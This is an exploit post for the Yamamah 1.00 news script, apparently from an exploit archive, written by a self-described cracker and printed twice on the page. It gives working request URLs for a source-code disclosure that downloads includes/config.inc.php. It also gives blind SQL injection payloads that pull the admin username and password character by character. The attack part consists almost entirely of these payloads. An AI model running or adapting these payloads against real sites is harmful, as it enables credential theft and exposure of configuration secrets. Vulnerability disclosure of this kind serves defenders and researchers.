Yamamah Mullti Vulnerability

2010.06.15
Credit: anT!-Tr0J4n
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Yamamah Mullti Vulnerability # Date: 9-06-2010 # Author: anT!-Tr0J4n #My Home : www.Dev-PoinT.com # Software Link:http://www.yamamah.org # Version: 1.00 # Tested on: Win7/Linux #DorK : N / A ========== Exploit By anT!-Tr0J4n============ =======Yamamah source code disclosure Vulnerability ============ [>] exploit -> http://localhsot/yamamah/index.php?download=(file name) http://server/[path]/index.php?download=includes/config.inc.php ====================================================== [>] Yamamah (news) Blind SQL Injection Vulnerability ====================================================== [>] exploit -> [>] (news) Blind SQL Injection [>] http://localhost/yamamah/?news=1[BSQLi] =================POC===================== http://server/yamamah/?news=1+and substring(@@version,1,1)=5 --> True http://server/yamamah/?news=1+and substring(@@version,1,1)=4 --> False http://server/yamamah/?news=1+and%20%28select%20substring%28concat%281,username%29,1,1%29%20from%20admin%20limit%200,1%29=1 http://server/yamamah/?news=1+and%20%28select%20substring%28concat%281,password%29,1,1%29%20from%20admin%20limit%200,1%29=1 ===============ABDO-R3ZK================== MY HomE : www.Dev-PoinT.com Author : anT!-Tr0J4n EmaiL : D3v-PoinT@Hotmail.com & C1EH@Hotmail.com Special Thx:Dev-P0!nT T34M /GlaDiatOr/SILVER STAR/ProfessionaL/Coffin Of Evil/HoBeeZ/ ABO-FaHED /Gonone Rash3d EL maged /mahmoudvip/ Mr.Mh$TEr / M [Zero] / R3d-D3v1l (ALL sEc-r1z crEw) /Cyber-Err0r/ saLman EL anz33 / FnooN =ABUO ShADEN /NASHY && And All My Frindes ===============ABDO-R3ZK================== Hotmail: بريد إلكتروني موثوق فيه ويتمتع بحماية Microsoft القوية من البريد العشوائي. اشترك الآن. EXPLOIT Yamamah Mullti Vulnerability.txt # Exploit Title: Yamamah Mullti Vulnerability # Date: 9-06-2010 # Author: anT!-Tr0J4n #My Home : www.Dev-PoinT.com # Software Link:http://www.yamamah.org # Version: 1.00 # Tested on: Win7/Linux #DorK : N / A ========== Exploit By anT!-Tr0J4n============ =======Yamamah source code disclosure Vulnerability ============ [>] exploit -> http://localhsot/yamamah/index.php?download=(file name) http://server/[path]/index.php?download=includes/config.inc.php ====================================================== [>] Yamamah (news) Blind SQL Injection Vulnerability ====================================================== [>] exploit -> [>] (news) Blind SQL Injection [>] http://localhost/yamamah/?news=1[BSQLi] =================POC===================== http://server/yamamah/?news=1+and substring(@@version,1,1)=5 --> True http://server/yamamah/?news=1+and substring(@@version,1,1)=4 --> False http://server/yamamah/?news=1+and%20%28select%20substring%28concat%281,username%29,1,1%29%20from%20admin%20limit%200,1%29=1 http://server/yamamah/?news=1+and%20%28select%20substring%28concat%281,password%29,1,1%29%20from%20admin%20limit%200,1%29=1 ===============ABDO-R3ZK================== MY HomE : www.Dev-PoinT.com Author : anT!-Tr0J4n EmaiL : D3v-PoinT@Hotmail.com & C1EH@Hotmail.com Special Thx:Dev-P0!nT T34M /GlaDiatOr/SILVER STAR/ProfessionaL/Coffin Of Evil/HoBeeZ/ ABO-FaHED /Gonone Rash3d EL maged /mahmoudvip/ Mr.Mh$TEr / M [Zero] / R3d-D3v1l (ALL sEc-r1z crEw) /Cyber-Err0r/ saLman EL anz33 / FnooN =ABUO ShADEN /NASHY && And All My Frindes ===============ABDO-R3ZK==================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top